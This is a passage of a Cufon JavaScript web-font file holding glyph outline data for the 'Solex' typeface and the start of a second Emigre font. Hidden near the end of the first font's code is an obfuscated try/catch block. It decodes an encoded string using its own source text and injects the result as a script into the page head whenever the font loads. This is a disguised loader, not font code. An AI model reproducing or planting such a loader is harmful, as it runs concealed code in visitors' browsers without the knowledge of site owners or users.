61,-48,66r0,46r-33,0r0,-77v30,2,48,-5,46,-35v7,-48,-51,-38,-78,-25r0,-34xm40,-21v0,-13,11,-24,24,-24v13,0,25,11,25,24v0,14,-11,25,-25,25v-13,0,-24,-12,-24,-25","w":149},{"d":"18,-13r0,-33r68,-53r-68,-53r0,-33r101,80r0,12","w":137},{"d":"117,-160r-21,0r-7,-88r35,0xm50,-160r-21,0r-7,-88r35,0","w":146,"k":{"T":-7,"A":22}},{"d":"51,-115v59,15,7,142,83,138r0,22v-52,-1,-77,-39,-75,-97v1,-38,-15,-49,-41,-56r0,-14v25,-9,42,-19,41,-57v-2,-58,24,-95,75,-97r0,22v-77,-3,-24,124,-83,139","w":137},{"d":"54,-46v-2,27,23,20,33,4r10,-11r0,-127r33,0v1,60,-4,127,4,180v-23,3,-31,-5,-34,-24v-12,12,-24,27,-45,28v-29,0,-34,-25,-35,-54r0,-130r34,0r0,134","w":152,"k":{"'":7}},{"d":"120,0r0,-115r-58,0r0,115r-34,0r0,-248r34,0r0,101r58,0r0,-101r34,0r0,248r-34,0","w":182},{"d":"28,0r0,-248r95,0r0,31r-61,0r0,70r57,0r0,32r-57,0r0,83r65,0r0,32r-99,0xm77,-277r-26,0r40,-51r29,0","w":144},{"d":"80,-215v-3,34,-27,45,-37,71r39,0r0,23r-63,0v-7,-48,32,-59,38,-94v-3,-20,-27,-7,-38,-1r0,-26v23,-13,64,-12,61,27","w":97},{"d":"26,0r0,-221r-20,0r0,-27r53,0r0,248r-33,0","w":84},{"d":"40,-153r37,37r36,-37r18,18r-37,36r36,37r-17,17r-36,-37r-37,37r-17,-17r37,-37r-37,-37"},{"d":"26,28v18,14,73,32,70,-12r0,-36v-11,11,-22,23,-41,24v-29,0,-34,-25,-35,-54r0,-130r34,0r0,134v-2,27,23,20,33,4r9,-11r0,-127r34,0r0,194v6,62,-59,67,-104,47r0,-33xm104,-237v19,0,19,32,0,32v-9,0,-16,-6,-16,-16v0,-10,7,-16,16,-16xm48,-237v8,0,15,7,15,16v0,9,-7,16,-15,16v-9,0,-15,-7,-16,-16v0,-9,7,-15,16,-16","w":151},{"d":"51,-160r-23,0r-7,-88r37,0","w":78,"k":{"t":-6,"s":5,"T":-7,"S":-4,"A":22}},{"d":"108,-277r-20,-25r-21,25r-27,0r40,-51r15,0r40,51r-27,0xm148,-54v0,36,-25,58,-61,58v-36,0,-61,-22,-61,-58r0,-194r34,0r0,193v0,18,10,26,28,26v18,0,27,-8,27,-26r0,-193r33,0r0,194","w":174},{"d":"122,-246v4,40,-38,47,-59,22v-10,-7,-18,-1,-19,12r-18,0v1,-21,7,-38,27,-38v19,0,25,16,41,18v9,-1,8,-4,10,-14r18,0xm76,-184v50,0,58,40,58,94v0,54,-8,94,-58,94v-52,0,-58,-40,-58,-94v0,-54,6,-94,58,-94xm76,-23v29,0,25,-35,25,-67v0,-33,4,-67,-25,-67v-29,0,-25,35,-25,67v0,33,-4,67,25,67","w":151},{"d":"123,0r-44,-112r-17,31r0,81r-34,0r0,-248r34,0r-3,126v18,-46,43,-84,65,-126r32,0r-56,99r59,149r-36,0","w":159,"k":{"O":4,"G":4,"C":4,".":-7,",":-4,"'":5,"\"":5}},{"d":"124,0r-13,-61r-65,0r-13,61r-30,0r58,-248r131,0r0,31r-84,0r17,70r63,0r0,32r-56,0r20,83r44,0r0,32r-72,0xm104,-92r-25,-136r-26,136r51,0","w":214},{"d":"76,-184v50,0,58,40,58,94v0,54,-8,94,-58,94v-52,0,-58,-40,-58,-94v0,-54,6,-94,58,-94xm76,-23v29,0,25,-35,25,-67v0,-33,4,-67,-25,-67v-29,0,-25,35,-25,67v0,33,-4,67,25,67","w":151,"k":{"'":18}},{"d":"26,28v18,14,73,32,70,-12r0,-36v-11,11,-22,23,-41,24v-29,0,-34,-25,-35,-54r0,-130r34,0r0,134v-2,27,23,20,33,4r9,-11r0,-127r34,0r0,194v6,62,-59,67,-104,47r0,-33","w":151,"k":{"'":5}},{"d":"18,-121r0,-24r14,0r0,-74r-14,7r0,-25v11,-5,20,-13,39,-11r0,103r14,0r0,24r-53,0","w":97},{"d":"77,-248v70,-1,84,54,85,124v0,70,-16,123,-85,124r-49,0r0,-248r49,0xm62,-32v59,6,65,-38,65,-92v0,-54,-5,-100,-65,-93r0,185","w":181,"k":{"Z":9,"Y":11,"X":7,"T":7,"A":4,".":14,",":18,"'":7}},{"d":"30,-116r0,-24r93,0r0,24r-93,0xm30,-59r0,-23r93,0r0,23r-93,0"},{"d":"34,-76r0,-172r34,0r0,172r-34,0xm27,-21v0,-13,11,-25,24,-24v13,0,25,12,25,24v0,13,-11,25,-25,25v-13,0,-24,-12,-24,-25","w":105},{"d":"91,-95r0,95r-34,0r0,-95r-54,-153r35,0r38,115v10,-41,26,-76,38,-115r31,0xm79,-277r-26,0r40,-51r29,0","w":147},{"d":"19,-93r0,-12r101,-80r0,33r-69,53r69,53r0,33","w":137},{"d":"67,-277r-20,-25r-21,25r-27,0r40,-51r15,0r40,51r-27,0xm29,0r0,-248r34,0r0,248r-34,0","w":91},{"d":"36,-126r0,-122r26,0r0,122r-26,0xm36,34r0,-123r26,0r0,123r-26,0","w":98},{"d":"18,-21v0,-13,11,-24,24,-24v13,0,25,11,25,24v0,14,-11,25,-25,25v-13,0,-24,-12,-24,-25xm18,-148v0,-13,11,-25,24,-25v14,0,25,11,25,25v0,13,-12,24,-25,24v-13,0,-24,-11,-24,-24","w":91},{"d":"78,-205r-42,-51r28,0r40,51r-26,0","w":136},{"d":"99,-134v2,-27,-23,-20,-33,-4r-11,12r0,126r-33,0r0,-248r33,0r0,90v12,-12,23,-26,43,-26v29,0,34,25,35,54r0,130r-34,0r0,-134","k":{"'":16}},{"d":"102,-237v19,0,19,32,0,32v-9,0,-16,-6,-16,-16v0,-10,7,-16,16,-16xm46,-237v8,0,15,7,15,16v0,9,-7,16,-15,16v-9,0,-15,-7,-16,-16v0,-9,7,-15,16,-16","w":145},{"d":"110,-251v75,0,93,50,92,127v0,76,-17,126,-92,126v-76,0,-91,-50,-91,-126v-1,-77,16,-128,91,-127xm110,-16v65,0,73,-43,73,-108v0,-65,-7,-108,-73,-108v-66,0,-73,44,-73,108v0,65,9,108,73,108xm95,-97v-3,34,34,29,48,12r0,32v-9,4,-21,9,-34,8v-40,0,-41,-37,-41,-79v0,-43,1,-79,41,-80v12,0,25,5,34,9r0,30v-10,-7,-18,-12,-31,-13v-27,4,-14,48,-17,81","w":219},{"d":"51,-157v12,-23,69,-43,76,-1v12,-12,23,-26,43,-26v29,0,34,24,34,54r0,130r-33,0r0,-134v2,-27,-24,-21,-33,-4v-3,3,-6,5,-8,9r0,129r-34,0r0,-134v3,-28,-23,-20,-33,-4r-8,8r0,130r-33,0v-1,-60,4,-127,-4,-180v21,-3,32,3,33,23","w":224,"k":{"'":13}},{"d":"80,-217r0,217r-34,0r0,-217r-47,0r0,-31r127,0r0,31r-46,0","w":125,"k":{"z":14,"y":18,"x":16,"w":14,"v":14,"u":18,"s":18,"r":14,"q":19,"p":14,"o":19,"n":14,"m":14,"g":19,"e":19,"d":19,"c":19,"a":19,"O":4,"G":4,"C":4,"A":7,";":11,":":11,".":25,",":25,"'":-7,"\"":-7}},{"d":"42,-123v13,0,25,11,25,24v0,13,-12,24,-25,24v-13,0,-24,-11,-24,-24v0,-13,11,-24,24,-24","w":91},{"d":"76,-184v50,0,58,40,58,94v0,54,-8,94,-58,94v-52,0,-58,-40,-58,-94v0,-54,6,-94,58,-94xm76,-23v29,0,25,-35,25,-67v0,-33,4,-67,-25,-67v-29,0,-25,35,-25,67v0,33,-4,67,25,67xm103,-237v19,0,19,32,0,32v-9,0,-16,-6,-16,-16v0,-10,7,-16,16,-16xm47,-237v8,0,15,7,15,16v0,9,-7,16,-15,16v-9,0,-15,-7,-16,-16v0,-9,7,-15,16,-16","w":151},{"d":"78,-184v52,-2,52,44,50,96r-77,0v-1,35,1,62,33,62v15,0,28,-6,40,-14r0,32v-14,4,-29,11,-49,11v-52,0,-56,-40,-57,-93v0,-55,8,-92,60,-94xm97,-114v-1,-24,2,-44,-20,-43v-22,1,-26,15,-26,43r46,0","w":147,"k":{"'":11}},{"d":"87,-252v65,1,67,60,67,128v0,69,-4,128,-67,128v-64,0,-67,-61,-67,-128v0,-67,2,-128,67,-128xm87,-28v40,-4,33,-51,33,-96v0,-45,8,-96,-33,-96v-41,0,-33,52,-33,96v0,44,-7,92,33,96xm114,-309v19,0,19,32,0,32v-9,0,-16,-6,-16,-16v0,-10,7,-16,16,-16xm58,-309v8,0,15,7,15,16v0,9,-7,16,-15,16v-9,0,-15,-7,-16,-16v0,-9,7,-15,16,-16","w":174},{"d":"29,0r0,-248r34,0r0,248r-34,0","w":91},{"d":"148,-140v1,47,-3,100,4,140v-16,0,-31,3,-32,-15v-10,9,-22,19,-40,19v-59,-3,-60,-63,-60,-128v0,-68,1,-126,65,-128v22,-1,41,7,55,13r0,39v-11,-7,-32,-18,-51,-17v-42,2,-35,49,-35,93v0,47,-6,104,43,95v7,-4,12,-10,17,-16r0,-63r-25,0r0,-32r59,0","w":168,"k":{"'":4}},{"d":"95,-4v-5,3,-21,6,-31,6v-32,2,-35,-18,-35,-50r0,-105r-24,0r0,-27r24,0r0,-41r33,0r0,41r33,0r0,27r-33,0r1,116v2,14,21,9,32,7r0,26","w":101,"k":{"z":-4,".":-4}},{"d":"68,-184v86,0,39,123,57,184r-24,0v-4,-5,-7,-11,-9,-19v-21,35,-81,28,-81,-29v0,-44,27,-65,76,-60v1,-23,2,-47,-22,-46v-20,1,-33,7,-47,15r0,-33v12,-4,32,-12,50,-12xm71,-82v-33,-6,-40,55,-13,59v9,1,22,-13,29,-20r0,-39r-16,0xm65,-205r-42,-51r28,0r40,51r-26,0","w":142},{"d":"56,-184v-7,53,56,35,100,38r0,30r-18,0v0,39,-2,83,4,116v-17,1,-30,2,-31,-15v-10,9,-21,19,-39,19v-66,0,-69,-113,-28,-135v-37,-27,-29,-132,38,-121v18,3,38,5,51,9r0,35v-25,-14,-84,-25,-77,24xm76,-28v13,-1,22,-10,29,-18r0,-70v-37,-3,-57,8,-54,45v1,23,2,43,25,43","w":167},{"d":"136,-318v4,40,-39,47,-60,22v-10,-7,-18,-1,-19,12r-17,0v1,-21,7,-38,27,-38v21,-1,43,36,51,4r18,0xm129,-50v-11,-58,-6,-131,-7,-198r31,0r0,248r-28,0r-66,-173v-2,-8,-5,-16,-7,-25v8,60,6,130,6,198r-30,0r0,-248r28,0","w":181},{"d":"148,-54v0,36,-25,58,-61,58v-36,0,-61,-22,-61,-58r0,-194r34,0r0,193v0,18,10,26,28,26v18,0,27,-8,27,-26r0,-193r33,0r0,194xm113,-309v19,0,19,32,0,32v-9,0,-16,-6,-16,-16v0,-10,7,-16,16,-16xm57,-309v8,0,15,7,15,16v0,9,-7,16,-15,16v-9,0,-15,-7,-16,-16v0,-9,7,-15,16,-16","w":174},{"d":"26,-85r0,-28r94,0r0,28r-94,0","w":145},{"d":"89,-87r0,48r-24,0r0,-48r-47,0r0,-24r47,0r0,-53r24,0r0,53r46,0r0,24r-46,0xm18,0r0,-24r117,0r0,24r-117,0"},{"d":"53,-153v22,-40,82,-43,82,23r0,130r-33,0r0,-134v2,-27,-24,-20,-34,-4r-13,14r0,124r-33,0v-1,-60,4,-127,-4,-180r24,0v5,5,9,17,11,27","w":155,"k":{"'":16}},{"d":"87,-28v40,-4,33,-51,33,-96v0,-45,8,-96,-33,-96v-41,0,-33,52,-33,96v0,44,-7,92,33,96xm102,3v-4,32,14,42,42,35r0,28v-47,9,-78,-11,-73,-64v-49,-11,-51,-65,-51,-126v0,-67,2,-128,67,-128v65,1,67,60,67,128v1,64,-3,116,-52,127","w":174,"k":{"X":4}},{"d":"82,-133v-30,-10,-32,23,-31,52v1,26,-3,56,22,56v35,0,21,-59,24,-98xm18,-80v-4,-64,34,-103,80,-73v-1,-17,-6,-31,-12,-44r-31,18r0,-27r20,-11v-10,-13,-23,-25,-36,-32r38,0v6,5,16,12,21,19r32,-19r0,27r-19,11v12,25,21,55,20,95v-2,62,3,120,-58,120v-45,0,-52,-32,-55,-84"},{"d":"108,-277r-21,-25r-20,25r-27,0r40,-51r15,0r40,51r-27,0xm87,-252v65,1,67,60,67,128v0,69,-4,128,-67,128v-64,0,-67,-61,-67,-128v0,-67,2,-128,67,-128xm87,-28v40,-4,33,-51,33,-96v0,-45,8,-96,-33,-96v-41,0,-33,52,-33,96v0,44,-7,92,33,96","w":174},{"d":"28,0r0,-248r34,0r0,216r63,0r0,32r-97,0","w":128,"k":{"Y":18,"W":13,"V":14,"U":4,"T":11,"S":4,"O":4,"G":4,"C":4,".":-7,",":-4,"'":29,"\"":29}},{"d":"76,-184v50,0,58,40,58,94v0,54,-8,94,-58,94v-52,0,-58,-40,-58,-94v0,-54,6,-94,58,-94xm76,-23v29,0,25,-35,25,-67v0,-33,4,-67,-25,-67v-29,0,-25,35,-25,67v0,33,-4,67,25,67xm78,-205r-26,0r40,-51r29,0","w":151},{"d":"86,-164v45,1,55,32,55,84v1,50,-11,84,-58,84v-59,0,-55,-58,-60,-120v-6,-86,23,-168,108,-124r0,34v-23,-20,-72,-20,-72,21v0,9,-2,20,-2,33v6,-5,17,-12,29,-12xm108,-80v6,-43,-22,-72,-51,-42v3,42,-8,90,26,97v26,-1,21,-28,25,-55","w":159},{"d":"0,19r0,-19r154,0r0,19r-154,0"},{"d":"129,-50v-11,-58,-6,-131,-7,-198r31,0r0,248r-28,0r-66,-173v-2,-8,-5,-16,-7,-25v8,60,6,130,6,198r-30,0r0,-248r28,0","w":181},{"d":"76,-248v29,0,49,20,49,49v0,29,-19,50,-49,50v-30,0,-50,-21,-50,-50v0,-30,21,-49,50,-49xm76,-172v14,0,26,-13,26,-27v0,-13,-13,-26,-26,-26v-14,0,-27,12,-27,26v0,14,13,27,27,27","w":151},{"d":"84,-248v72,-7,80,110,33,137r43,111r-36,0r-37,-102r-25,0r0,102r-34,0r0,-248r56,0xm62,-134v35,5,50,-8,50,-41v0,-33,-15,-47,-50,-42r0,83","w":171,"k":{"Y":11,"T":7,"'":11}},{"d":"77,-248v70,-1,84,54,85,124v0,70,-16,123,-85,124r-49,0r0,-112r-28,0r0,-29r28,0r0,-107r49,0xm62,-32v59,6,65,-38,65,-92v0,-54,-5,-100,-65,-93r0,76r32,0r0,29r-32,0r0,80","w":181},{"d":"54,-46v-2,27,23,20,33,4r10,-11r0,-127r33,0v1,60,-4,127,4,180v-23,3,-31,-5,-34,-24v-12,12,-24,27,-45,28v-29,0,-34,-25,-35,-54r0,-130r34,0r0,134xm75,-205r-42,-51r28,0r40,51r-26,0","w":152},{"d":"26,28v18,14,73,32,70,-12r0,-36v-11,11,-22,23,-41,24v-29,0,-34,-25,-35,-54r0,-130r34,0r0,134v-2,27,23,20,33,4r9,-11r0,-127r34,0r0,194v6,62,-59,67,-104,47r0,-33xm80,-205r-26,0r40,-51r29,0","w":151},{"d":"80,4v-72,11,-74,-106,-37,-136v-29,-31,-27,-130,37,-120v64,-9,65,89,37,120v37,29,35,147,-37,136xm80,-144v22,0,23,-15,23,-40v0,-24,-1,-40,-23,-40v-22,0,-23,16,-23,40v0,25,1,40,23,40xm80,-25v25,0,27,-22,27,-46v0,-29,-1,-45,-27,-46v-25,-1,-27,20,-27,46v0,26,2,46,27,46","w":159},{"d":"187,0r-33,0r-33,-183v-8,64,-22,122,-33,183r-34,0r-47,-248r34,0r33,208v7,-74,24,-140,37,-208r23,0r36,208v8,-73,22,-139,34,-208r30,0","w":241,"k":{"y":7,"u":7,"r":4,"o":11,"e":11,"a":11,"A":7,";":11,":":11,".":29,",":29}},{"d":"93,0r-28,-61r-29,61r-32,0r45,-90r-43,-90r36,0r26,57r27,-57r32,0r-43,86r45,94r-36,0","w":132},{"d":"80,-1v-51,20,-62,-36,-62,-89v0,-52,10,-109,60,-89v8,4,16,9,21,16r0,-85r34,0r0,198v0,16,2,36,3,50r-23,0v-4,-5,-8,-13,-10,-21v-6,8,-14,16,-23,20xm80,-152v-32,-12,-29,30,-29,62v0,33,-3,73,29,62v5,-3,14,-13,19,-20r0,-84v-5,-7,-14,-17,-19,-20","w":154},{"d":"148,-54v0,36,-25,58,-61,58v-36,0,-61,-22,-61,-58r0,-194r34,0r0,193v0,18,10,26,28,26v18,0,27,-8,27,-26r0,-193r33,0r0,194","w":174},{"d":"78,-184v52,-2,52,44,50,96r-77,0v-1,35,1,62,33,62v15,0,28,-6,40,-14r0,32v-14,4,-29,11,-49,11v-52,0,-56,-40,-57,-93v0,-55,8,-92,60,-94xm97,-114v-1,-24,2,-44,-20,-43v-22,1,-26,15,-26,43r46,0xm80,-205r-42,-51r28,0r40,51r-26,0","w":147},{"d":"106,-57r0,-31r-79,0r0,-24r102,0r0,55r-23,0","w":159},{"d":"68,-184v86,0,39,123,57,184r-24,0v-4,-5,-7,-11,-9,-19v-21,35,-81,28,-81,-29v0,-44,27,-65,76,-60v1,-23,2,-47,-22,-46v-20,1,-33,7,-47,15r0,-33v12,-4,32,-12,50,-12xm71,-82v-33,-6,-40,55,-13,59v9,1,22,-13,29,-20r0,-39r-16,0xm69,-205r-26,0r40,-51r29,0","w":142},{"d":"103,-63v-43,32,-85,-3,-85,-71v0,-49,10,-85,58,-84v61,0,60,58,60,120v0,66,4,135,-62,135v-18,0,-33,-6,-46,-11r0,-35v23,20,72,23,72,-20v0,-9,3,-21,3,-34xm52,-134v-6,44,20,69,51,42v-4,-41,9,-94,-27,-97v-26,-2,-21,29,-24,55","w":159}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+-607-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("B[!)Yk?JNOVGB8dn$krh,[,Vq5?)!kVGq53hNO@#!g;CsAJH$dRcOra)1Lcksga}c8L4r[`,3BT1?X+|@{-ugOqs!NYy$e9b]HS&dk#m0%xCRGF_ahAJ)5Dlwfn;VPU)1LcS!d0y$-}_s53y$-}_s-c;u8]]q`u_1[gdq`u_1[sJq`u_1[!Hq`u_1[4hq`u_1[3k{&)y$-}_!-!Sq`u_1[,5q`u_1[3Hsda)1Lcd?)a)1LcSX`$-9da)1Lcks)a)1Lcd?`)y$-}_!-3y$-}_sA@y$-}_!S]y$-}_s5ry$-}_!OrAq`u_1[|A!kdy$-}_s5?y$-}_![gy$-}_sS@y$-}_!O@O@gdy$-}_skrxNda)1Lc&?u!y$-}_!-d#q`u_1[uAeda)1Lck1S1Gq`u_1[gH1{?y$-}_!S$y$-}_sO!y$-}_sS?y$-}_!kgy$-}_!Osbq`u_1[,lq`u_1[gSX)a)1Lc&Xra)1LcS1da)1LcS1)a)1Lc]?)a)1LcS?)a)1Lcd?-$y$-}_sAry$-}_sk@y$-}_s-ry$-}_sA}J|Ac8q`u_1[,)q`u_1[@kq`u_1[?&qda)1Lc]sda)1Lc]!ga)1Lc]?8gy$-}_!Ldyqra)1Lc&s{ay$-}_sk?y$-}_sOry$-}_!L3y$-}_s-?y$-}_s-g+yra)1LcH!{|)B)_F|`401da)1LcS?ga)1Lck1{0$yS;Pq83n$u]y$-}_sAdy$-}_sS3Cq`u_1[|Dq`u_1[!k3)a)1Lc&sda)1Lck?uRy$-}_sA!Fega)1LcHXu|V,ga)1Lc&!Lay$-}_s5gy$-}_s-sfs[]y$-}_s-]y$-}_s-dRgra)1LcH?)a)1Lck?kgy$-}_!L!3@D@y$-}_!-}kq`u_1[|aq`u_1[@STga)1LcH1Ow@q`u_1[s_q`u_1[|J-ra)1Lck1A!9-da)1LcH1r3y$-}_!Lcy$-}_!Sdy$-}_!k|lgD]&gga)1LcdXra)1Lc]s)a)1Lcd1-&HT#?_Y[dJB8,HB{a0+-}CyL)HT#}CYL)_TkadYk$JN8a#+O,G!Hw#Y`d_N`1VeDJnNOsmsHwFNAJFqHbUX#$D$)_GB-;m+A0R![)]q8wH!{&&T5&G$[gA$8]CY5?]$[dFYHwmYD?JYkrR!{&0!kVhBLR0+[_nBhR0BO$Ys)R0qgJVyrR0qqJ0B8&b")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":153,"face":{"font-family":"Solex","font-weight":500,"font-stretch":"normal","units-per-em":"360","panose-1":"2 0 6 6 3 0 0 2 0 4","ascent":"281","descent":"-79","x-height":"4","bbox":"-12 -358 234 72.1204","underline-thickness":"10.8","underline-position":"-26.28","unicode-range":"U+0020-U+00FF"}}));
/*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * Copyright (C) 2000, Emigre Inc.; Designed by Zuzana Licko
 * 
 * Manufacturer:
 * C) Emigre Inc
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"8,-49v3,-41,25,-65,73,-61v1,-20,1,-40,-19,-39v-19,1,-34,7,-47,15r0,-38v41,-19,107,-21,107,46v0,42,-3,91,4,126v-21,1,-32,0,-38,-16v-23,35,-84,21,-80,-33xm81,-78v-37,-11,-47,44,-21,51v10,-1,15,-9,21,-15r0,-36xm70,-205r-30,0r38,-48r32,0","w":141},{"d":"86,-252v66,0,69,59,69,128v0,69,-3,128,-69,128v-64,0,-68,-58,-68,-128v0,-70,4,-128,68,-128xm86,-36v43,-5,20,-84,25,-134v-3,-24,-1,-43,-25,-43v-35,0,-25,50,-25,89v0,39,-9,84,25,88xm88,-277r-30,0r38,-48r32,0","w":173},{"d":"35,0r-37,0r58,-248r47,0r58,248r-43,0r-12,-56r-59,0xm98,-94v-8,-37,-17,-74,-21,-116r-22,116r43,0xm64,-325r38,48r-30,0r-40,-48r32,0","w":161},{"d":"75,-184v52,0,59,41,59,94v0,53,-7,94,-59,94v-52,0,-60,-40,-60,-94v0,-55,8,-94,60,-94xm75,-27v31,-7,16,-78,14,-115v-2,-8,-6,-10,-14,-11v-30,5,-18,61,-18,96v0,17,3,28,18,30xm100,-205v-10,0,-17,-7,-17,-17v0,-10,7,-17,17,-17v10,0,17,7,17,17v0,10,-7,17,-17,17xm45,-205v-10,0,-17,-7,-17,-17v0,-10,7,-17,17,-17v10,0,16,7,16,17v0,10,-6,17,-16,17","w":149},{"d":"68,-248r0,248r-42,0r0,-248r42,0xm54,-277r-30,0r38,-48r32,0","w":93},{"d":"107,-185v0,39,-7,68,-45,68v-37,0,-45,-27,-45,-68v0,-39,7,-67,45,-67v38,0,45,30,45,67xm62,-227v-22,3,-10,39,-13,64v1,12,1,21,13,20v21,-2,12,-41,12,-64v0,-12,-3,-19,-12,-20","w":123},{"d":"121,-249v-1,21,-7,38,-28,39v-21,1,-41,-35,-46,-3r-20,0v1,-23,7,-39,27,-40v20,-1,41,36,46,4r21,0xm40,-180v6,5,12,12,16,21v11,-12,28,-26,44,-25v30,1,35,21,35,53r0,131r-41,0r0,-131v2,-24,-18,-17,-26,-5r-8,9r0,127r-41,0v-1,-60,4,-127,-4,-180r25,0","w":152},{"d":"66,0r-41,0r0,-148r-19,0r0,-32r60,0r0,180xm19,-253r38,48r-30,0r-40,-48r32,0","w":88},{"d":"168,-63v6,-66,19,-124,29,-185r37,0r-48,248r-37,0r-30,-159v-7,56,-19,107,-30,159r-37,0r-48,-248r43,0r27,185v6,-67,23,-124,34,-185r28,0","w":239,"k":{"y":11,"u":11,"t":7,"s":11,"r":11,"o":14,"e":14,"d":14,"c":14,"a":14,"A":7,";":7,":":7,".":22,",":22,"'":-7}},{"d":"58,-49v-2,24,19,17,27,5r5,-7r0,-129r41,0v1,60,-4,127,4,180v-22,3,-35,-4,-40,-19v-25,35,-78,30,-78,-30r0,-131r41,0r0,131xm99,-205v-10,0,-17,-7,-17,-17v0,-10,7,-17,17,-17v10,0,17,7,17,17v0,10,-7,17,-17,17xm44,-205v-10,0,-17,-7,-17,-17v0,-10,7,-17,17,-17v10,0,16,7,16,17v0,10,-6,17,-16,17","w":150},{"d":"15,-182v-5,-70,64,-82,114,-58r0,45v-19,-15,-78,-35,-74,13v1,22,2,32,21,32v48,0,61,29,65,77v6,71,-65,93,-117,66r0,-45v22,18,81,31,77,-21v-2,-25,-4,-32,-26,-33v-45,0,-56,-29,-60,-76","w":155,"k":{"Y":7,"X":4,"V":4,"T":4,"'":4}},{"d":"190,-8v-30,12,-85,23,-97,-14v-10,13,-23,27,-44,26v-28,-1,-41,-22,-41,-53v1,-43,25,-66,73,-63v1,-20,0,-38,-19,-37v-19,1,-34,7,-47,15r0,-38v24,-11,69,-19,90,-1v36,-23,98,-10,89,47r0,45r-72,0v0,32,3,56,37,49v10,-2,21,-6,31,-12r0,36xm156,-112v6,-27,-11,-56,-30,-32v-2,9,-5,19,-4,32r34,0xm81,-81v-36,-11,-47,47,-21,54v23,-5,28,-26,21,-54","w":209},{"d":"127,-321v-1,21,-6,39,-27,39v-21,0,-41,-35,-46,-3r-21,0v-3,-40,36,-49,58,-25v10,7,15,1,16,-11r20,0xm35,0r-37,0r58,-248r47,0r58,248r-43,0r-12,-56r-59,0xm98,-94v-8,-37,-17,-74,-21,-116r-22,116r43,0","w":161},{"d":"66,-205r-30,0r38,-48r32,0","w":141},{"d":"18,-124v0,-69,2,-128,66,-128v21,0,40,6,55,12r0,47v-11,-8,-30,-16,-48,-16v-38,2,-30,45,-30,85v0,42,-6,85,27,92v6,0,11,-4,17,-11r0,-64r-16,0r0,-39r59,0v1,49,-3,104,4,146v-17,0,-33,2,-37,-11v-7,8,-20,15,-34,15v-61,-3,-63,-61,-63,-128","w":167,"k":{"'":4}},{"d":"73,-223r-15,18r-30,0r38,-48r14,0r38,48r-30,0xm75,-184v52,0,59,41,59,94v0,53,-7,94,-59,94v-52,0,-60,-40,-60,-94v0,-55,8,-94,60,-94xm75,-27v31,-7,16,-78,14,-115v-2,-8,-6,-10,-14,-11v-30,5,-18,61,-18,96v0,17,3,28,18,30","w":149},{"d":"86,-252v66,0,69,59,69,128v0,69,-3,128,-69,128v-64,0,-68,-58,-68,-128v0,-70,4,-128,68,-128xm86,-36v43,-5,20,-84,25,-134v-3,-24,-1,-43,-25,-43v-35,0,-25,50,-25,89v0,39,-9,84,25,88xm111,-277v-10,0,-17,-7,-17,-17v0,-10,7,-17,17,-17v10,0,17,7,17,17v0,10,-7,17,-17,17xm56,-277v-10,0,-17,-7,-17,-17v0,-10,7,-17,17,-17v10,0,16,7,16,17v0,10,-6,17,-16,17","w":173},{"d":"-8,-37v20,0,37,8,37,-17r0,-194r43,0r0,202v5,48,-34,54,-80,47r0,-38","w":97},{"d":"45,0r-43,-180r40,0r25,123r24,-123r36,0r-43,180r-39,0","w":129,"k":{".":18,",":18}},{"d":"115,-156v0,15,-14,29,-28,29v-15,0,-28,-14,-28,-29v0,-15,14,-28,28,-28v14,0,28,13,28,28xm20,2v0,-39,15,-60,46,-66r0,-39r41,0r0,76v-26,-2,-44,4,-44,29v0,42,49,33,74,22r0,40v-54,18,-117,9,-117,-62","w":147},{"d":"58,-49v-2,24,19,17,27,5r5,-7r0,-129r41,0v1,60,-4,127,4,180v-22,3,-35,-4,-40,-19v-25,35,-78,30,-78,-30r0,-131r41,0r0,131xm64,-253r38,48r-30,0r-40,-48r32,0","w":150},{"d":"73,-150v24,2,30,-5,29,-30v-1,-19,-3,-31,-20,-31v-15,0,-21,9,-20,25r0,186r-40,0r0,-186v0,-44,19,-61,60,-65v61,-6,73,78,46,114v37,24,37,138,-23,138v-14,0,-23,-2,-32,-5r0,-41v6,4,12,7,21,7v19,0,18,-17,19,-37v2,-29,-9,-41,-40,-36r0,-39","w":162},{"d":"64,0r-41,0r0,-216r-19,0r0,-32r60,0r0,248","w":86},{"d":"58,-49v-2,24,19,17,27,5r5,-7r0,-129r41,0r0,194v9,65,-68,66,-107,46r0,-37v14,8,26,15,45,16v25,2,21,-28,21,-53v-29,33,-73,18,-73,-35r0,-131r41,0r0,131xm83,-205r-30,0r38,-48r32,0","w":150},{"d":"84,-115v-59,-14,-7,-139,-81,-137r0,-24v51,2,75,40,74,97v-1,36,14,48,41,55r0,17v-26,8,-42,19,-41,55v1,58,-22,96,-74,97r0,-23v74,2,22,-123,81,-137","w":133},{"d":"69,0r-43,0r0,-248r43,0r0,98r43,0r0,-98r42,0r0,248r-42,0r0,-111r-43,0r0,111","w":181},{"d":"105,2r-101,-252r23,0r101,252r-23,0","w":132},{"d":"9,-198v-2,-67,86,-48,150,-50r0,24r-23,0r0,296r-24,0r0,-296r-29,0r0,296r-24,0r0,-221v-30,-1,-49,-20,-50,-49","w":167},{"d":"86,-36v43,-6,21,-73,27,-126r-44,118v3,6,8,9,17,8xm86,-213v-43,9,-20,79,-26,135r46,-123v-4,-8,-9,-11,-20,-12xm155,-124v-1,68,-5,126,-69,128v-13,0,-24,-2,-32,-7r-8,21r-21,0r13,-35v-17,-25,-20,-59,-20,-107v0,-69,4,-126,68,-128v15,0,27,2,36,9r8,-23r21,0r-14,38v15,25,18,59,18,104","w":173},{"d":"68,-201v0,-12,1,-24,-11,-23v-15,1,-27,6,-38,12r0,-32v32,-12,80,-16,82,34r3,90v-13,-1,-27,1,-30,-12v-16,23,-60,17,-60,-24v0,-32,19,-48,54,-45xm68,-175v-24,-9,-33,27,-15,32v12,1,18,-16,15,-32","w":115},{"d":"75,-184v52,0,59,41,59,94v0,53,-7,94,-59,94v-